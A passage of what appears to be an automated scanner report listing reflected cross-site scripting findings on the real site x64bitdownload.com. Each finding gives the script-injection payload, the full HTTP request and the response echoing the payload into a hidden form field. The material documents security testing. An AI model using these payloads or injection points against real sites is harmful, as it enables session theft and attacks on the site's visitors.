<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/featured-software.html?a0316"><script>alert(1)</script>cac9cd247c2=1" />
...[SNIP]...

1.320. http://www.x64bitdownload.com/js/general.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/general.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9880a"><script>alert(1)</script>87d32f52238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9880a"><script>alert(1)</script>87d32f52238/general.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js9880a"><script>alert(1)</script>87d32f52238/general.js" />
...[SNIP]...

1.321. http://www.x64bitdownload.com/js/general.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/general.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a0"><script>alert(1)</script>0ea982c7227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/general.js4c9a0"><script>alert(1)</script>0ea982c7227 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js/general.js4c9a0"><script>alert(1)</script>0ea982c7227" />
...[SNIP]...

1.322. http://www.x64bitdownload.com/js/rating.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/rating.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a62f2"><script>alert(1)</script>4ce7a17d51f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa62f2"><script>alert(1)</script>4ce7a17d51f/rating.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/jsa62f2"><script>alert(1)</script>4ce7a17d51f/rating.js" />
...[SNIP]...

1.323. http://www.x64bitdownload.com/js/rating.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/rating.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca2f"><script>alert(1)</script>e3cfc32ca97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/rating.js7ca2f"><script>alert(1)</script>e3cfc32ca97 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js/rating.js7ca2f"><script>alert(1)</script>e3cfc32ca97" />
...[SNIP]...

1.324. http://www.x64bitdownload.com/linktous.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bea"><script>alert(1)</script>99c6425b343 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linktous.htmlb4bea"><script>alert(1)</script>99c6425b343 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/linktous.htmlb4bea"><script>alert(1)</script>99c6425b343" />
...[SNIP]...

1.325. http://www.x64bitdownload.com/linktous.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe20"><script>alert(1)</script>73a79dc6461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linktous.html?cfe20"><script>alert(1)</script>73a79dc6461=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/linktous.html?cfe20"><script>alert(1)</script>73a79dc6461=1" />
...[SNIP]...

1.326. http://www.x64bitdownload.com/login.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/login.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90208"><script>alert(1)</script>513c51908fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.html90208"><script>alert(1)</script>513c51908fe HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/login.html90208"><script>alert(1)</script>513c51908fe" />
...[SNIP]...

1.327. http://www.x64bitdownload.com/new-reviews.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d8f"><script>alert(1)</script>0e3502762a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-reviews.html32d8f"><script>alert(1)</script>0e3502762a9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:28:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-reviews.html32d8f"><script>alert(1)</script>0e3502762a9" />
...[SNIP]...

1.328. http://www.x64bitdownload.com/new-reviews.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efabf"><script>alert(1)</script>0fd7b226cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-reviews.html?efabf"><script>alert(1)</script>0fd7b226cd3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:17 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-reviews.html?efabf"><script>alert(1)</script>0fd7b226cd3=1" />
...[SNIP]...

1.329. http://www.x64bitdownload.com/new-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a3ba"><script>alert(1)</script>991a789ffdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-software.html7a3ba"><script>alert(1)</script>991a789ffdb HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-software.html7a3ba"><script>alert(1)</script>991a789ffdb" />
...[SNIP]...

1.330. http://www.x64bitdownload.com/new-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6b9"><script>alert(1)</script>0bb8bbb0810 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-software.html?5c6b9"><script>alert(1)</script>0bb8bbb0810=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:36 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-software.html?5c6b9"><script>alert(1)</script>0bb8bbb0810=1" />
...[SNIP]...

1.331. http://www.x64bitdownload.com/ratestars.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/ratestars.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98f8"><script>alert(1)</script>4fb8449076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratestars.htmlf98f8"><script>alert(1)</script>4fb8449076 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/ratestars.htmlf98f8"><script>alert(1)</script>4fb8449076" />
...[SNIP]...

1.332. http://www.x64bitdownload.com/ratestars.html [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/ratestars.html

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecc10"><script>alert(1)</script>171150b91a2 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratestars.html?j=1&q=lhtivudsecc10"><script>alert(1)</script>171150b91a2&t=173.193.214.243&c=5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: nocache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/ratestars.html?j=1&q=lhtivudsecc10"><script>alert(1)</script>171150b91a2&t=173.193.214.243&c=5" />
...[SNIP]...

1.333. http://www.x64bitdownload.com/rss/downloads.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/rss/downloads.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1476"><script>alert(1)</script>9457535a8e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rsse1476"><script>alert(1)</script>9457535a8e1/downloads.xml HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/rsse1476"><script>alert(1)</script>9457535a8e1/downloads.xml" />
...[SNIP]...

1.334. http://www.x64bitdownload.com/rss/downloads.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/rss/downloads.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a07"><script>alert(1)</script>79728d417c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rss/downloads.xmlb6a07"><script>alert(1)</script>79728d417c5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/rss/downloads.xmlb6a07"><script>alert(1)</script>79728d417c5" />
...[SNIP]...

1.335. http://www.x64bitdownload.com/saved-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21945"><script>alert(1)</script>5b51a8a7029 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saved-software.html21945"><script>alert(1)</script>5b51a8a7029 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/saved-software.html21945"><script>alert(1)</script>5b51a8a7029" />
...[SNIP]...

1.336. http://www.x64bitdownload.com/saved-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c955f"><script>alert(1)</script>40eb90fe594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saved-software.html?c955f"><script>alert(1)</script>40eb90fe594=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/saved-software.html?c955f"><script>alert(1)</script>40eb90fe594=1" />
...[SNIP]...

1.337. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b5b"><script>alert(1)</script>17473a35adb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot32b5b"><script>alert(1)</script>17473a35adb/communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot32b5b"><script>alert(1)</script>17473a35adb/communitymate-download-qeakzpwv.html" />
...[SNIP]...

1.338. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68784"><script>alert(1)</script>91cdfef4f9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/68784"><script>alert(1)</script>91cdfef4f9f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
